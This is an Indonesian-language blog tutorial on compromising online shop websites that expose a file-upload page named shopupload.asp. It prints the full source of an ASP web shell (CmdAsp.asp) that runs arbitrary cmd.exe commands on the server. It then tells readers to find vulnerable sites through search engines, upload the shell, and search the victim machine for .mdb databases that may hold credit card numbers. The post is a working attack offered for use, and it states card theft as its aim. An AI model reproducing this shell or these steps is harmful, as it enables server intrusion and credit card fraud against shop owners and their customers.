Home / hacking / Hack Website Shopping With shopupload.asp

Hack Website Shopping With shopupload.asp

Posted by the moon air Sabtu, 07 Juli 2012 0 komentar


Hmmm, sebelumnya mungkin penulis harus berterima kasih dulu kepada
kawan penulis Co_BaiN yang telah mengajarkan penulis tentang hal ini dan
kemudian mulai penulis kembangkan sendiri mengenai teknik ini berdasarkan
buku “WEB HACKING” karangan Stuart McClure ,Saumil Shah dan Shreeraj
shah ☺☺☺.
Sebenarnya teknik ini mudah banget lho, gak percaya ??? Bahkan hampir
semudah semudah copy-paste di bug web folder ☺ hanya saya di sini ada
dituntut untuk memahami command-command DOS (no unix command here !!!)
lebih banyak, atau paling tidak sedikitlah.
Hmm... mungkin ada yang harus penulis ingatkan, walau judul artikel kali ini
adalah “HACK WEBSITE SHOPPING WITH shopupload.ASP” tetapi menulis
tidak ingin membahas bagaimana mencari Credit Card di sini, karena apa ???
Yah, karena penulis sendiri cenderung malas untuk mencari cc sendiri, mending
minta pasteannya aja ama kawan :P~ prĂȘt !!!
Nah, lalu bagaimana langkah selanjutnya ????
Langkah pertama adalah silahkan copy-kan script ASP yang penulis dapatkan
dari site securiteam.com berikut ini lalu di save dengan nama terserah anda yang
penting ekstensinya adalah asp, sebagai contoh anda simpan saja script ASP ini
dengan nama beben.asp :
---------------------=[ cut here the code ]=---------------------
<%@ Language=VBScript %>
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo <maceo @ dogmile.com>
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
' -- Use a poor man's pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Eksekusi Perintah">
39
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<br>
<%
If (IsObject(oFile)) Then
' -- Read the output from our command and remove the temp file -- '
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
<-- CmdAsp.asp -->
---------------------=[ cut here the code ]=---------------------
Huff..., gimana ??? banyak banget ya codenya ??? Kalo pembaca semua malas
buat copy-paste itu text, silahkan ada mendownloadnya di
www.geocities.com/beben_tools/cmdasp.txt, hehehehe...... sekalian promosi
kecil-kecilan ☺☺☺.
Oh iya hampir lupa, langkah selanjutnya yah ??? hmmm anda bisa mencari
target di google atau di search engine kesayangan anda, terus masukkan
keywords yang kira-kira akan mengarahkan anda ke web yang memiliki file
shopupload.asp (penulis tak sengaja menemukannya ketika mencoba-coba
mencari shopdbtest.asp kemudia ketika penulis menghapus nama file
shopdbtest.asp eh ternyata tuh site bisa di browsing directory, nah kemudian
penulis menemukan file shopupload.asp ini :P~ )
Nah, setelah menemukan file tersebut, sekarang anda bisa mengupload file
kesayangan anda ke target ☺☺☺ dan dalam contoh kali ini kita akan mengcopy
file beben.asp yang berisi file-file jahat untuk mengeksekusi comamnd-command
di target ☺☺☺ dan alngkah selanjutnya adalah hak anda tersendiri untuk
melakukannya.
Hm... jika anda ingin mencari cc di target, silahkan aja anda ketik command
berikut :
Dir *.mdb /s
Command itu berguna untuk mencari file-file yang berekstensi .mdb di seluruh
pc korban, siapa tau ada beberapa file menarik yang berisi cc di dalamnya. Lalu
untuk men-downloadnya, hehehe... silahkan cari sendiri caranya, penulis gak
mau ikutan dapat dosa kolektif atas penyalahgunaan cc yang anda dapat
tersebut ☺☺☺
Sekian artikel ini penulis buat, semoga ente merimanya dengan lapang dada.
Amienn.......
Description: Hack Website Shopping With shopupload.asp
Rating: 5
Reviewer: 98827 ulasan
Item Reviewed: Hack Website Shopping With shopupload.asp
TERIMA KASIH ATAS KUNJUNGAN SAUDARA
Judul: Hack Website Shopping With shopupload.asp
Ditulis oleh the moon air
Rating Blog 5 dari 5
Semoga artikel ini bermanfaat bagi saudara. Jika ingin mengutip, baik itu sebagian atau keseluruhan dari isi artikel ini harap menyertakan link dofollow ke http://themoonair.blogspot.com/2012/07/hack-website-shopping-with.html. Terima kasih sudah singgah membaca artikel ini.
Categories:

If You Like This Post, Share it With Your Friends

0 komentar:

Posting Komentar

iklan adbrite

Redesigned by Info Terbaru Original by Bamz | Copyright of the moon air. Untuk SEO lebih lanjut kunjungi Trik SEO terbaru.
Hak Cipta oleh: The Moon Air. Diberdayakan oleh Blogger.